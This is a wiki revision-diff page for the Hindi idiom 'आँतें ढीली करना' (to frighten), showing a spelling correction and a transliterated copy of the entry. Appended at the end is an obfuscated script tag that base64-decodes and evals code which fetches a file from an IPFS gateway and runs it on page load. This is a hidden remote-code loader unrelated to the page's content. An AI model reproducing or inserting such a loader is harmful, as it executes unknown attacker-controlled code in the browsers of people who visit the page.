Difference between revisions of "आँतें ढीली करना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (सपना वर्मा ने आँते ढीली करना पृष्ठ आँतें ढीली करना पर स्थानांतरित किया)
Line 1: Line 1:
'''आँते ढीली करना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
+
'''आँतें ढीली करना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
 
'''अर्थ'''- भयभीत करना।
 
'''अर्थ'''- भयभीत करना।
  
'''प्रयोग'''- मगर उस [[चिड़िया -राजेश जोशी|चिड़िया]] की आवाज जैसे उसकी भीतरी आँते ढीली किए दे रही थी। - [[अजितसेन|अजित पुष्कल]]
+
'''प्रयोग'''- मगर उस [[चिड़िया -राजेश जोशी|चिड़िया]] की आवाज जैसे उसकी भीतरी आँतें ढीली किए दे रही थी। - [[अजितसेन|अजित पुष्कल]]
  
  

Revision as of 07:27, 20 October 2015

aantean dhili karana ek prachalit lokokti athava hindi muhavara hai.

arth- bhayabhit karana.

prayog- magar us chi diya ki avaj jaise usaki bhitari aantean dhili kie de rahi thi. - ajit pushkal


tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>